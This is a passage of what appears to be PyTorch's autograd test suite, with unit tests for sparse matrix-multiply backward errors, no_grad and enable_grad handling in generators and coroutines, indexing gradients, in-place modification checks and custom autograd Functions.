dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
